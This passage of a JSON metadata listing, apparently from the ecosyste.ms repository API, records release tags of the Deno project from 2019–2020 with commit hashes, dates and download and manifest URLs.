denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commi